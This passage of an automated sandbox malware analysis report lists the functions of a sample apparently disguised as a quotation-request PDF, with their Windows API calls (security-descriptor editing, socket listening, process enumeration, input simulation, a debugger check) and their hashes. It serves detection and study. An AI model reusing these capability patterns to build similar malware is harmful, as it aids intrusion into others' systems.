                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 1255039815-0
                                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                    Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 00433073
                                                                    • __swprintf.LIBCMT ref: 00433085
                                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                    • String ID:
                                                                    • API String ID: 1158019794-0
                                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                    Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                    Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                    Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_strncmp
                                                                    • String ID: @oH$\$^$h
                                                                    • API String ID: 2175499884-3701065813
                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                    Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                    Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                    • API String ID: 0-2872873767
                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                    Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2547909840-0
                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                    Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                    • String ID: *.*$\VH
                                                                    • API String ID: 2786137511-2657498754
                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                    Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID: pqI
                                                                    • API String ID: 2579439406-2459173057
                                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                    Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicollmouse_event
                                                                    • String ID: DOWN
                                                                    • API String ID: 1033544147-711622031
                                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                    Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 3031425849-0
                                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                    Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                    Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                    • IsIconic.USER32 ref: 0047A393
                                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
